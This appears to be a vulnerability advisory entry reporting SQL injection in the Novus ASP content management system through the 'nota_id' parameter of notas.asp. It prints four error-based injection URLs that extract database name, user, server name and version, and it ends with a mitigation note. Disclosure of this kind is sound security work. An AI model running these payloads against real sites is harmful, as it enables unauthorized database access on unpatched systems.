vendor:
Sistema de administracion y contenido
by:
ka0x, an0de, xarnuz, s0cratex
7.5
CVSS
HIGH
Sql Injection
89
CWE
Product Name: Sistema de administracion y contenido
Affected Version From:
Affected Version To:
Patch Exists: NO
Related CWE:
CPE:
Platforms Tested: ASP
2007
Novus – Sistema de administracion y contenido.
The Novus system is vulnerable to SQL Injection. By manipulating the 'nota_id' parameter in the 'notas.asp' page, an attacker can execute arbitrary SQL queries. The following SQL injection payloads can be used to extract sensitive information: - http://[novus]/notas.asp?nota_id=1+and+1=convert(int,db_name()) - http://[novus]/notas.asp?nota_id=1+and+1=convert(int,system_user) - http://[novus]/notas.asp?nota_id=1+and+1=convert(int,@@servername)-- - http://[novus]/notas.asp?nota_id=1+and+1=convert(int,@@version)--
Mitigation:
To mitigate this vulnerability, it is recommended to properly sanitize and validate user input before using it in SQL queries. Implementing parameterized queries or prepared statements can help prevent SQL Injection attacks.